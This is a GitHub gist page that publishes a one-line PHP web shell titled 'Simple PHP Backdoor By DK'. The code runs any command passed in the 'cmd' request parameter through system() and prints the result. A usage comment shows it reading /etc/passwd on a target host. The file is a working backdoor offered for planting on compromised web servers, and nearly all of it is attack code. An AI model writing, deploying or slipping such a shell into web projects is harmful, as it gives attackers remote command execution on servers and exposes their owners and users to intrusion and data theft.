Skip to content

Instantly share code, notes, and snippets.

Show Gist options
  • Save ngekoding/9d036f8eddc77c5501c04a12bc7ca3a5 to your computer and use it in GitHub Desktop.
Save ngekoding/9d036f8eddc77c5501c04a12bc7ca3a5 to your computer and use it in GitHub Desktop.
<!-- Simple PHP Backdoor By DK (One-Liner Version) -->
<!-- Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd -->
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment